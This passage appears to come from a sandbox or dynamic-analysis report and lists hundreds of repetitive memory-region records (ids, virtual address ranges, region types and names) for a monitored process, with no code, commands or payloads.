"pagefile_0x0000000000610000" filename = "" Region: id = 13579 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13580 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 13581 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 13582 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13583 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13584 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13585 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13586 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13587 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13588 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13589 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13590 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13591 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13592 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13593 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13594 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13595 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13596 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13597 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13598 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13599 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13600 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13601 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13602 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13603 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13604 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13605 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13606 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13607 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13608 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13609 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13610 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13611 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13612 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13613 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13614 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13615 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 13616 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 13617 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13618 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13619 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13620 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 13621 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 13622 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13623 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13624 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13625 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13626 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13627 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13628 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13629 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13630 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13631 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13632 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13633 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13634 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13635 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13636 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13637 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13638 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13639 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13640 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13641 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13642 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13643 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13644 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13645 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13646 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13647 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13648 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13649 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13650 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13651 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13652 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13653 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13654 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13655 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13656 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13657 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13658 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13659 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13660 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13661 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13662 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 13663 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 13664 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13665 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13666 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13667 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13668 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13669 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13670 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13671 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13672 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13673 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13674 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13675 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13676 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13677 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13678 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13679 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13680 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13681 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13682 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13683 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13684 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13685 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13686 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13687 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13688 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13689 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13690 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13691 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13692 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13693 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13694 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13695 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13696 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13697 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13698 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13699 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13700 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13701 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13702 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13703 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13704 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13705 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13706 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13707 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13708 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13709 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13710 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13711 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13712 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13713 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 13714 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13715 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13716 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13717 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13718 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13719 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13720 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13721 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13722 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13723 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13724 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13725 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13726 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13727 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13728 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13729 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13730 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 13731 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13732 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13733 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 13734 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 13735 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13736 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13737 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13738 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 13739 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 13740 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13741 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13742 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13743 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13744 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13745 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13746 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13747 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13748 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13749 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13750 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13751 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13752 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13753 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13754 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13755 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13756 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13757 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13758 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13759 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13760 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13761 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13762 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13763 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13764 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13765 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13766 